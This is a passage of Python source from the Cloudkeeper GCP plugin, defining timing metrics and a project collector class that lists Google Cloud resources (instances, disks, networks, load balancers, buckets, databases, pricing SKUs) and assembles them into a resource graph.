"cloudkeeper_plugin_gcp_collect_autoscalers_seconds", "Time it took the collect_autoscalers() method", ) metrics_collect_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_health_checks_seconds", "Time it took the collect_health_checks() method", ) metrics_collect_http_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_http_health_checks_seconds", "Time it took the collect_http_health_checks() method", ) metrics_collect_https_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_https_health_checks_seconds", "Time it took the collect_https_health_checks() method", ) metrics_collect_url_maps = Summary( "cloudkeeper_plugin_gcp_collect_url_maps_seconds", "Time it took the collect_url_maps() method", ) metrics_collect_target_pools = Summary( "cloudkeeper_plugin_gcp_collect_target_pools_seconds", "Time it took the collect_target_pools() method", ) metrics_collect_target_instances = Summary( "cloudkeeper_plugin_gcp_collect_target_instances_seconds", "Time it took the collect_target_instances() method", ) metrics_collect_target_http_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_http_proxies_seconds", "Time it took the collect_target_http_proxies() method", ) metrics_collect_target_https_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_https_proxies_seconds", "Time it took the collect_target_https_proxies() method", ) metrics_collect_target_ssl_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_ssl_proxies_seconds", "Time it took the collect_target_ssl_proxies() method", ) metrics_collect_target_tcp_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_tcp_proxies_seconds", "Time it took the collect_target_tcp_proxies() method", ) metrics_collect_target_grpc_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_grpc_proxies_seconds", "Time it took the collect_target_grpc_proxies() method", ) metrics_collect_backend_services = Summary( "cloudkeeper_plugin_gcp_collect_backend_services_seconds", "Time it took the collect_backend_services() method", ) metrics_collect_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_forwarding_rules_seconds", "Time it took the collect_forwarding_rules() method", ) metrics_collect_global_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_global_forwarding_rules_seconds", "Time it took the collect_global_forwarding_rules() method", ) metrics_collect_buckets = Summary( "cloudkeeper_plugin_gcp_collect_buckets_seconds", "Time it took the collect_buckets() method", ) metrics_collect_databases = Summary( "cloudkeeper_plugin_gcp_collect_databases_seconds", "Time it took the collect_databases() method", ) metrics_collect_services = Summary( "cloudkeeper_plugin_gcp_collect_services_seconds", "Time it took the collect_services() method", ) metrics_collect_instance_templates = Summary( "cloudkeeper_plugin_gcp_collect_instance_templates_seconds", "Time it took the collect_instance_templates() method", ) class GCPProjectCollector: """Collects a single GCP project. Responsible for collecting all the resources of an individual project. Builds up its own local graph which is then taken by collect_project() and merged with the plugin graph. This way we can have many instances of GCPProjectCollector running in parallel. All building up individual graphs which in the end are merged to a final graph containing all GCP resources. """ def __init__(self, project: GCPProject) -> None: """ Args: project: The GCP project resource object this project collector is going to collect. """ self.project = project self.credentials = Credentials.get(self.project.id) self.graph = Graph(root=self.project) # Mandatory collectors are always collected regardless of whether # they were included by --gcp-collect or excluded by --gcp-no-collect self.mandatory_collectors = { "regions": self.collect_regions, "zones": self.collect_zones, } # Global collectors are resources that are either specified on a global level # as opposed to a per zone or per region level or they are zone/region # resources that provide a aggregatedList() function returning all resources # for all zones/regions. self.global_collectors = { "services": self.collect_services, "networks": self.collect_networks, "subnetworks": self.collect_subnetworks, "routers": self.collect_routers, "routes": self.collect_routes, "health_checks": self.collect_health_checks, "http_health_checks": self.collect_http_health_checks, "https_health_checks": self.collect_https_health_checks, "machine_types": self.collect_machine_types, "instances": self.collect_instances, "disk_types": self.collect_disk_types, "disks": self.collect_disks, "target_vpn_gateways": self.collect_target_vpn_gateways, "vpn_gateways": self.collect_vpn_gateways, "vpn_tunnels": self.collect_vpn_tunnels, "security_policies": self.collect_security_policies, "snapshots": self.collect_snapshots, "ssl_certificates": self.collect_ssl_certificates, "network_endpoint_groups": self.collect_network_endpoint_groups, "instance_groups": self.collect_instance_groups, "instance_group_managers": self.collect_instance_group_managers, "autoscalers": self.collect_autoscalers, "backend_services": self.collect_backend_services, "url_maps": self.collect_url_maps, "target_pools": self.collect_target_pools, "target_instances": self.collect_target_instances, "target_http_proxies": self.collect_target_http_proxies, "target_https_proxies": self.collect_target_https_proxies, "target_ssl_proxies": self.collect_target_ssl_proxies, "target_tcp_proxies": self.collect_target_tcp_proxies, "target_grpc_proxies": self.collect_target_grpc_proxies, "forwarding_rules": self.collect_forwarding_rules, "buckets": self.collect_buckets, "databases": self.collect_databases, "instance_templates": self.collect_instance_templates, } # Region collectors collect resources in a single region. # They are being passed the GCPRegion resource object as `region` arg. self.region_collectors = {} # Zone collectors are being called for each zone. # They are being passed the GCPZone resource object as `zone` arg. self.zone_collectors = {} self.all_collectors = dict(self.mandatory_collectors) self.all_collectors.update(self.global_collectors) self.all_collectors.update(self.region_collectors) self.all_collectors.update(self.zone_collectors) self.collector_set = set(self.all_collectors.keys()) @retry( stop_max_attempt_number=10, wait_exponential_multiplier=3000, wait_exponential_max=300000, retry_on_exception=retry_on_error, ) def collect(self) -> None: """Runs the actual resource collection across all resource collectors. Resource collectors add their resources to the local `self.graph` graph. """ self.graph = Graph(root=self.project) collectors = set(self.collector_set) if len(ArgumentParser.args.gcp_collect) > 0: collectors = set(ArgumentParser.args.gcp_collect).intersection(collectors) if len(ArgumentParser.args.gcp_no_collect) > 0: collectors = collectors - set(ArgumentParser.args.gcp_no_collect) collectors = collectors.union(set(self.mandatory_collectors.keys())) log.debug( ( f"Running the following collectors in {self.project.rtdname}:" f" {", ".join(collectors)}" ) ) for collector_name, collector in self.mandatory_collectors.items(): if collector_name in collectors: log.info(f"Collecting {collector_name} in {self.project.rtdname}") collector() regions = [r for r in self.graph.nodes if isinstance(r, GCPRegion)] zones = [z for z in self.graph.nodes if isinstance(z, GCPZone)] log.debug(f"Found {len(zones)} zones in {len(regions)} regions") for collector_name, collector in self.global_collectors.items(): if collector_name in collectors: log.info(f"Collecting {collector_name} in {self.project.rtdname}") collector() # Todo: parallelize region and zone collection for region in regions: for collector_name, collector in self.region_collectors.items(): if collector_name in collectors: log.info( ( f"Collecting {collector_name} in {region.rtdname}" f" {self.project.rtdname}" ) ) collector(region=region) for zone in zones: for collector_name, collector in self.zone_collectors.items(): if collector_name in collectors: log.info( ( f"Collecting {collector_name} in {zone.rtdname}" f" {self.project.rtdname}" ) ) collector(zone=zone) def default_attributes( self, result: Dict, attr_map: Dict = None, search_map: Dict = None ) -> Dict: """Finds resource attributes in the GCP API result data and returns them together with any graph search results. Args: result: Dict containing the result or a GCP API execute() call. attr_map: Dict of map_to: map_from pairs where map_to is the name of the arg that a Cloudkeeper resource expects and map_from is the name of the key in the result dictionary. search_map: Dict of map_to: [search_attr, search_value_name]. Where map_to is the arg that a Cloudkeeper resource expects. search_attr is the attribute name to search for in the graph and search_value_name is the name of the key in the result dictionary that is passed into the graph search as attribute value. Example: result: ``` { 'creationTimestamp': '2020-10-08T05:45:43.294-07:00', 'id': '7684174949783877401', 'kind': 'compute#disk', 'labelFingerprint': '42WmSpB8rSM=', 'lastAttachTimestamp': '2020-10-08T05:45:43.294-07:00', 'name': 'instance-group-1-lnmq', 'physicalBlockSizeBytes': '4096', 'sizeGb': '10', 'status': 'READY', 'selfLink': 'https://www.googleapis.com/.../disks/instance-1-lnmq', 'type': 'https://www.googleapis.com/.../diskTypes/pd-standard', 'users': ['https://www.googleapis.com/.../instances/instance-1-lnmq'], 'zone': 'https://www.googleapis.com/.../zones/europe-west1-d' } attr_map: { "volume_size": "sizeGb", "volume_status": "status", } search_map: { "volume_type": ["link", "type"], "__users": ["link", "users"], } ``` This would create GCPDisk( identifier="7684174949783877401", name="instance-group-1-lnmq", ctime=iso2datetime("2020-10-08T05:45:43.294-07:00"), volume_size="10", volume_status="READY", volume_type=GCPDiskType() link="https://www.googleapis.com/.../disks/instance-1-lnmq" ) Where the GCPDiskType() object would be one that was found in the graph with attribute "link": https://www.googleapis.com/.../diskTypes/pd-standard The map_from and search_value_name in attr_map and search_map respectively can also be a callable which is passed the entire result dict and then responsible for finding and returning the relevant data. E.g. the entry from above: "volume_size": "sizeGb", could also be written as: "volume_size": (lambda r: r.get("sizeGb")), This is mainly useful for searching deeply nested data. Any key in the search_map that starts with an underscore like _users in the example above will only be looked up and if found added to the search_results return value but not be added to kwargs. This returned search data can then be used to draw predecessor and successor edges in the graph. """ # The following are default attributes that are passed to every # BaseResource() if found in `result` kwargs = { "id": result.get("id", result.get("name", result.get("selfLink"))), "tags": result.get("labels", {}), "name": result.get("name"), "ctime": iso2datetime(result.get("creationTimestamp")), "link": result.get("selfLink"), "label_fingerprint": result.get("labelFingerprint"), "_account": self.project, } if attr_map is not None: for map_to, map_from in attr_map.items(): data = get_result_data(result, map_from) if data is None: log.debug(f"Attribute {map_from} not in result") continue log.debug(f"Found attribute {map_to}: {pformat(data)}") kwargs[map_to] = data # By default we search for a resources region and/or zone default_search_map = {"_region": ["link", "region"], "_zone": ["link", "zone"]} search_results = {} if search_map is None: search_map = dict(default_search_map) else: updated_search_map = dict(default_search_map) updated_search_map.update(search_map) search_map = updated_search_map for map_to, search_data in search_map.items(): search_attr = search_data[0] search_value_name = search_data[1] search_value = get_result_data(result, search_value_name) if search_value is None: continue if isinstance(search_value, List): search_values = search_value else: search_values = [search_value] for search_value in search_values: search_result = self.graph.search_first(search_attr, search_value) if search_result: if map_to not in search_results: search_results[map_to] = [] search_results[map_to].append(search_result) if ( map_to not in kwargs and map_to in search_results and not str(map_to).startswith("__") ): search_result = search_results[map_to] if len(search_result) == 1: kwargs[map_to] = search_result[0] else: kwargs[map_to] = list(search_result) # If the resource was referencing a zone but not a region we look up its # region based on the zone information we found. # E.g. if we know a disk is in zone us-central1-a then we can find # the region us-central1 from that. if ( "_zone" in kwargs and "_region" not in kwargs and isinstance(kwargs["_zone"], BaseResource) ): region = kwargs["_zone"].region(self.graph) if region: kwargs["_region"] = region if "_region" in search_map.keys() and "_region" not in search_results: search_results["_region"] = region return kwargs, search_results @except_log_and_pass(do_raise=socket.timeout) def collect_something( self, resource_class: Type[BaseResource], paginate_method_name: str = "list", paginate_items_name: str = "items", parent_resource: Union[BaseResource, str] = None, attr_map: Dict = None, search_map: Dict = None, successors: List = None, predecessors: List = None, client_kwargs: Dict = None, resource_kwargs: Dict = None, paginate_subitems_name: str = None, post_process: Callable = None, dump_resource: bool = False, ) -> List: """Collects some resource and adds it to the graph. Args: resource_class: A GCP resource class name that inherits Cloudkeeper's BaseResource paginate_method_name: usually "list" or "aggregatedList" paginate_items_name: key name that contains all the items of our list/aggregatedList request parent_resource: The resources parent resource in the graph. This defaults to the zone or region for local or the project for global resources. attr_map: Dict containing a mapping of GCP API result dict keys to resource_class attributes. See default_attributes() for a detailed description. search_map: Dict containing a mapping similar to attr_map except that any results get looked up in `self.graph` instead of just passing the result data as an attribute. successors: List of resource successors (child nodes) predecessors: List of resource predecessors (parent nodes) client_kwargs: **kwargs that get passed to the GCP client resource_kwargs: **kwargs that get passed to the GCP resource paginate_subitems_name: Name of a resource in a aggregatedList result set Defaults to be the name as the client method name. E.g. if we request all disks it'll be {"items": {'zones/...': {'disks': []}} post_process: Callable that is called after a resource has been added to the graph. The resource object and the graph are given as args. dump_resource: If True will log.debug() a dump of the API result. """ client_method_name = resource_class("", {})._client_method default_resource_args = resource_class("", {}).resource_args log.debug(f"Collecting {client_method_name}") if paginate_subitems_name is None: paginate_subitems_name = client_method_name if client_kwargs is None: client_kwargs = {} if resource_kwargs is None: resource_kwargs = {} if successors is None: successors = [] if predecessors is None: predecessors = [] parent_map = {True: predecessors, False: successors} if "project" in default_resource_args: resource_kwargs["project"] = self.project.id client = gcp_client( resource_class.client, resource_class.api_version, credentials=self.credentials, **client_kwargs, ) gcp_resource = getattr(client, client_method_name) if not callable(gcp_resource): raise RuntimeError(f"No method {client_method_name} on client {client}") for resource in paginate( gcp_resource=gcp_resource(), method_name=paginate_method_name, items_name=paginate_items_name, subitems_name=paginate_subitems_name, **resource_kwargs, ): kwargs, search_results = self.default_attributes( resource, attr_map=attr_map, search_map=search_map ) r = resource_class(**kwargs) pr = parent_resource log.debug(f"Adding {r.rtdname} to the graph") if dump_resource: log.debug(f"Resource Dump: {pformat(resource)}") if isinstance(pr, str) and pr in search_results: pr = search_results[parent_resource][0] log.debug(f"Parent resource for {r.rtdname} set to {pr.rtdname}") if not isinstance(pr, BaseResource): pr = kwargs.get("_zone", kwargs.get("_region", self.graph.root)) log.debug( f"Parent resource for {r.rtdname} automatically set to {pr.rtdname}" ) self.graph.add_resource(pr, r) for is_parent, sr_names in parent_map.items(): for sr_name in sr_names: if sr_name in search_results: srs = search_results[sr_name] for sr in srs: if is_parent: src = sr dst = r else: src = r dst = sr self.graph.add_edge(src, dst) else: if sr_name in search_map: graph_search = search_map[sr_name] attr = graph_search[0] value_name = graph_search[1] if value_name in resource: value = resource[value_name] if isinstance(value, List): values = value for value in values: r.add_deferred_connection( attr, value, is_parent ) elif isinstance(value, str): r.add_deferred_connection(attr, value, is_parent) else: log.error( ( "Unable to add deferred connection for" f" value {value} of type {type(value)}" ) ) else: log.error(f"Key {sr_name} is missing in search_map") if callable(post_process): post_process(r, self.graph) # All of the following methods just call collect_something() with some resource # specific options. @metrics_collect_regions.time() def collect_regions(self) -> List: def post_process(resource: GCPRegion, graph: Graph): for quota in resource._quotas: if set(["metric", "limit", "usage"]) == set(quota.keys()): q = GCPQuota( quota["metric"], {}, quota=quota["limit"], usage=quota["usage"], _region=resource.region(), _account=resource.account(), _zone=resource.zone(), ctime=resource.ctime, ) graph.add_resource(resource, q) resource._quotas = None self.collect_something( resource_class=GCPRegion, attr_map={"region_status": "status", "quotas": "quotas"}, post_process=post_process, ) @metrics_collect_zones.time() def collect_zones(self) -> List: self.collect_something( resource_class=GCPZone, ) @metrics_collect_disks.time() def collect_disks(self): def volume_status(result): status = result.get("status") num_users = len(result.get("users", [])) if num_users == 0 and status == "READY": status = "AVAILABLE" return status self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDisk, search_map={ "volume_type": ["link", "type"], "__users": ["link", "users"], }, attr_map={ "volume_size": (lambda r: int(r.get("sizeGb"))), "volume_status": volume_status, "last_attach_timestamp": ( lambda r: iso2datetime( r.get("lastAttachTimestamp", r["creationTimestamp"]) ) ), "last_detach_timestamp": ( lambda r: iso2datetime( r.get("lastDetachTimestamp", r["creationTimestamp"]) ) ), }, predecessors=["volume_type"], successors=["__users"], ) @metrics_collect_instances.time() def collect_instances(self): def post_process(resource: GCPInstance, graph: Graph): """Post process instance resources The first time we encounter a custom machine type we will fetch its details. This is because the machineTypes API's list/aggregatedList functions only return predefined machine types. Custom ones have to be fetched individually when we encounter them on a instance. Once added to the graph Cloudkeeper will find it for successive instances of the same machine type. """ if resource.instance_type == "" and "custom" in resource._machine_type_link: log.debug(f"Fetching custom instance type for {resource.rtdname}") machine_type = GCPMachineType( resource._machine_type_link.split("/")[-1], {}, _zone=resource.zone(graph), _account=resource.account(graph), link=resource._machine_type_link, ) resource._machine_type_link = None kwargs = {str(machine_type._get_identifier): machine_type.name} common_kwargs = common_resource_kwargs(machine_type) kwargs.update(common_kwargs) gr = gcp_resource(machine_type) request = gr.get(**kwargs) result = request.execute() machine_type.id = result.get("id") machine_type.instance_cores = float(result.get("guestCpus")) machine_type.instance_memory = float(result.get("memoryMb", 0) / 1024) graph.add_resource(machine_type.zone(graph), machine_type) graph.add_edge(machine_type, resource) self.post_process_machine_type(machine_type, graph) resource._machine_type = machine_type self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPInstance, post_process=post_process, search_map={ "__network": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "network" ) ), ], "__subnetwork": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "subnetwork" ) ), ], "machine_type": ["link", "machineType"], }, attr_map={ "instance_status": "status", "machine_type_link": "machineType", }, predecessors=["__network", "__subnetwork", "machine_type"], ) @metrics_collect_disk_types.time() def collect_disk_types(self): def post_process(resource: GCPDiskType, graph: Graph): if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) resource_group_map = { "local-ssd": "LocalSSD", "pd-balanced": "SSD", "pd-ssd": "SSD", "pd-standard": "PDStandard", } resource_group = resource_group_map.get(resource.name) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Storage", "usage_type": "OnDemand", "resource_group": resource_group, } ): try: if resource.region(graph).name not in sku.geo_taxonomy_regions: continue except TypeError: log.exception( f"Problem accessing geo_taxonomy_regions in {sku.rtdname}:" f" {type(sku.geo_taxonomy_regions)}" ) if resource.name == "pd-balanced" and not sku.name.startswith( "Balanced" ): continue if resource.name != "pd-balanced" and sku.name.startswith("Balanced"): continue if resource.zone(graph).name != "undefined" and sku.name.startswith( "Regional" ): continue if ( resource.zone(graph).name == "undefined" and not sku.name.startswith("Regional") and resource.name != "pd-balanced" ): continue skus.append(sku) if len(skus) == 1: graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 else: log.debug(f"Unable to determine SKU for {resource}") self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDiskType, post_process=post_process, ) @metrics_collect_networks.time() def collect_networks(self): self.collect_something( resource_class=GCPNetwork, ) @metrics_collect_subnetworks.time() def collect_subnetworks(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSubnetwork, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_vpn_tunnels.time() def collect_vpn_tunnels(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNTunnel, search_map={ "__vpn_gateway": ["link", "vpnGateway"], "__target_vpn_gateway": ["link", "targetVpnGateway"], }, successors=["__target_vpn_gateway", "__vpn_gateway"], ) @metrics_collect_vpn_gateways.time() def collect_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_target_vpn_gateways.time() def collect_target_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPTargetVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routers.time() def collect_routers(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPRouter, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routes.time() def collect_routes(self): self.collect_something( resource_class=GCPRoute, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_security_policies.time() def collect_security_policies(self): self.collect_something(resource_class=GCPSecurityPolicy) @metrics_collect_snapshots.time() def collect_snapshots(self): self.collect_something( resource_class=GCPSnapshot, search_map={ "volume_id": ["link", "sourceDisk"], }, attr_map={ "volume_size": lambda r: int(r.get("diskSizeGb", -1)), "storage_bytes": lambda r: int(r.get("storageBytes", -1)), }, ) @metrics_collect_ssl_certificates.time() def collect_ssl_certificates(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSSLCertificate, attr_map={ "ctime": lambda r: iso2datetime(r.get("creationTimestamp")), "expires": lambda r: iso2datetime(r.get("expireTime")), "description": "description", "certificate": "certificate", "certificate_type": "type", "certificate_managed": "managed", "subject_alternative_names": "subjectAlternativeNames", }, search_map={ "__user": ["link", "user"], }, successors=["__user"], ) @staticmethod def post_process_machine_type(resource: GCPMachineType, graph: Graph): """Adds edges from machine type to SKUs and determines ondemand pricing TODO: Implement GPU types """ if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Compute", "usage_type": "OnDemand", } ): if sku.resource_group not in ( "G1Small", "F1Micro", "N1Standard", "CPU", "RAM", ): continue if ("custom" not in resource.name and "Custom" in sku.name) or ( "custom" in resource.name and "Custom" not in sku.name ): continue if resource.region(graph).name not in sku.geo_taxonomy_regions: continue if resource.name == "g1-small" and sku.resource_group != "G1Small": continue if resource.name == "f1-micro" and sku.resource_group != "F1Micro": continue if ( resource.name.startswith("n2d-") and not sku.name.startswith("N2D AMD ") ) or ( not resource.name.startswith("n2d-") and sku.name.startswith("N2D AMD ") ): continue if (resource.name.startswith("n2-") and not sku.name.startswith("N2 ")) or ( not resource.name.startswith("n2-") and sku.name.startswith("N2 ") ): continue if ( resource.name.startswith("m1-") and not sku.name.startswith("Memory-optimized ") ) or ( not resource.name.startswith("m1-") and sku.name.startswith("Memory-optimized ") ): continue if ( resource.name.startswith("c2-") and not sku.name.startswith("Compute optimized ") ) or ( not resource.name.startswith("c2-") and sku.name.startswith("Compute optimized ") ): continue if resource.name.startswith("n1-") and sku.resource_group != "N1Standard": continue if "custom" not in resource.name: if ( resource.name.startswith("e2-") and not sku.name.startswith("E2 ") ) or ( not resource.name.startswith("e2-") and sku.name.startswith("E2 ") ): continue skus.append(sku) if len(skus) == 1 and resource.name in ("g1-small", "f1-micro"): graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 elif len(skus) == 2 or (len(skus) == 3 and "custom" in resource.name): ondemand_cost = 0 cores = resource.instance_cores ram = resource.instance_memory extended_memory_pricing = False if "custom" in resource.name: extended_memory_pricing = ram / cores > 8 for sku in skus: if "Core" in sku.name: ondemand_cost += sku.usage_unit_nanos * cores elif "Ram" in sku.name: if (extended_memory_pricing and "Extended" not in sku.name) or ( not extended_memory_pricing and "Extended" in sku.name ): continue ondemand_cost += sku.usage_unit_nanos * ram graph.add_edge(sku, resource) if ondemand_cost > 0: resource.ondemand_cost = ondemand_cost / 1000000000 else: log.debug( ( f"Unable to determine SKU(s) for {resource}:" f" {[sku.dname for sku in skus]}" ) ) @metrics_collect_machine_types.time() def collect_machine_types(self): self.collect_something( resource_class=GCPMachineType, paginate_method_name="aggregatedList", search_map={ "_zone": ["name", "zone"], }, attr_map={ "instance_cores": lambda r: float(r.get("guestCpus", 0)), "instance_memory": lambda r: float(r.get("memoryMb", 0) / 1024), }, post_process=self.post_process_machine_type, ) @metrics_collect_network_endpoint_groups.time() def collect_network_endpoint_groups(self): self.collect_something( resource_class=GCPNetworkEndpointGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_global_network_endpoint_groups.time() def collect_global_network_endpoint_groups(self): self.collect_something( resource_class=GCPGlobalNetworkEndpointGroup, search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_instance_groups.time() def collect_instance_groups(self): def post_process(resource: GCPInstanceGroup, graph: Graph): kwargs = {"instanceGroup": resource.name} kwargs.update(common_resource_kwargs(resource)) log.debug(f"Getting instances for {resource}") for r in paginate( gcp_resource=gcp_resource(resource, graph), method_name="listInstances", items_name="items", **kwargs, ): i = graph.search_first("link", r.get("instance")) if i: graph.add_edge(i, resource) self.collect_something( resource_class=GCPInstanceGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, predecessors=["__network", "__subnetwork"], post_process=post_process, ) @metrics_collect_instance_group_managers.time() def collect_instance_group_managers(self): self.collect_something( resource_class=GCPInstanceGroupManager, paginate_method_name="aggregatedList", search_map={ "__instance_group": ["link", "instanceGroup"], "__health_checks": [ "link", ( lambda r: [ hc.get("healthCheck", "") for hc in r.get("autoHealingPolicies", []) ] ), ], }, predecessors=["__instance_group", "__health_checks"], ) @metrics_collect_autoscalers.time() def collect_autoscalers(self): self.collect_something( resource_class=GCPAutoscaler, paginate_method_name="aggregatedList", search_map={ "__instance_group_manager": ["link", "target"], }, attr_map={ "min_size": ( lambda r: r.get("autoscalingPolicy", {}).get("minNumReplicas", -1) ), "max_size": ( lambda r: r.get("autoscalingPolicy", {}).get("maxNumReplicas", -1) ), }, successors=["__instance_group_manager"], ) @metrics_collect_health_checks.time() def collect_health_checks(self): self.collect_something( resource_class=GCPHealthCheck, paginate_method_name="aggregatedList", attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", }, ) @metrics_collect_http_health_checks.time() def collect_http_health_checks(self): self.collect_something( resource_class=GCPHTTPHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_https_health_checks.time() def collect_https_health_checks(self): self.collect_something( resource_class=GCPHTTPSHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_url_maps.time() def collect_url_maps(self): self.collect_something( resource_class=GCPUrlMap, paginate_method_name="aggregatedList", search_map={ "__default_service": ["link", "defaultService"], }, successors=["__default_service"], ) @metrics_collect_target_pools.time() def collect_target_pools(self): self.collect_something( resource_class=GCPTargetPool, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__instances": ["link", "instances"], }, attr_map={ "session_affinity": "sessionAffinity", "failover_ratio": "failoverRatio", }, predecessors=["__instances", "__health_checks"], ) @metrics_collect_target_instances.time() def collect_target_instances(self): self.collect_something( resource_class=GCPTargetInstance, paginate_method_name="aggregatedList", search_map={ "__instance": ["link", "instance"], }, predecessors=["__instance"], ) @metrics_collect_target_http_proxies.time() def collect_target_http_proxies(self): self.collect_something( resource_class=GCPTargetHttpProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_target_https_proxies.time() def collect_target_https_proxies(self): self.collect_something( resource_class=GCPTargetHttpsProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], "__ssl_certificates": ["link", "sslCertificates"], }, predecessors=["__url_map", "__ssl_certificates"], ) @metrics_collect_target_ssl_proxies.time() def collect_target_ssl_proxies(self): self.collect_something( resource_class=GCPTargetSslProxy, search_map={ "__service": ["link", "service"], "__ssl_certificates": ["link", "sslCertificates"], }, predecessors=["__service", "__ssl_certificates"], ) @metrics_collect_target_tcp_proxies.time() def collect_target_tcp_proxies(self): self.collect_something( resource_class=GCPTargetTcpProxy, search_map={ "__service": ["link", "service"], }, predecessors=["__service"], ) @metrics_collect_target_grpc_proxies.time() def collect_target_grpc_proxies(self): self.collect_something( resource_class=GCPTargetGrpcProxy, search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_backend_services.time() def collect_backend_services(self): self.collect_something( resource_class=GCPBackendService, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__backends": [ "link", (lambda r: [g.get("group", "") for g in r.get("backends", [])]), ], }, predecessors=["__health_checks", "__backends"], ) @metrics_collect_forwarding_rules.time() def collect_forwarding_rules(self): def post_process(resource: GCPForwardingRule, graph: Graph): instances = [ i.name for i in resource.ancestors(graph) if isinstance(i, GCPInstance) ] if len(instances) > 0: resource.backends = sorted(instances) self.collect_something( resource_class=GCPForwardingRule, paginate_method_name="aggregatedList", attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], post_process=post_process, ) @metrics_collect_global_forwarding_rules.time() def collect_global_forwarding_rules(self): self.collect_something( resource_class=GCPGlobalForwardingRule, attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], ) @metrics_collect_buckets.time() def collect_buckets(self): self.collect_something( resource_class=GCPBucket, attr_map={ "ctime": lambda r: iso2datetime(r.get("timeCreated")), "mtime": lambda r: iso2datetime(r.get("updated")), "bucket_location": "location", "bucket_location_type": "locationType", "storage_class": "storageClass", "zone_separation": "zoneSeparation", }, ) @metrics_collect_databases.time() def collect_databases(self): self.collect_something( resource_class=GCPDatabase, attr_map={ "db_type": "databaseVersion", "db_status": "state", "db_endpoint": lambda r: next( iter( [ ip["ipAddress"] for ip in r.get("ipAddresses", []) if ip.get("type") == "PRIMARY" ] ), None, ), "instance_type": lambda r: r.get("settings", {}).get("tier"), "volume_size": lambda r: int( r.get("settings", {}).get("dataDiskSizeGb", -1) ), "tags": lambda r: r.get("settings", {}).get("userLabels", {}), }, search_map={ "_region": ["name", "region"], "_zone": ["name", "gceZone"], }, ) @metrics_collect_services.time() def collect_services(self): def post_process(service: GCPService, graph: Graph): # Right now we are only interested in Compute Engine pricing if service.name != "Compute Engine": return gs = gcp_client("cloudbilling", "v1", credentials=self.credentials) kwargs = {"parent": f"services/{service.id}"} for r in paginate( gcp_resource=gs.services().skus(), method_name="list", items_name="skus", **kwargs, ): sku = GCPServiceSKU( r["skuId"], {}, name=r.get("description"), service=r.get("category", {}).get("serviceDisplayName"), 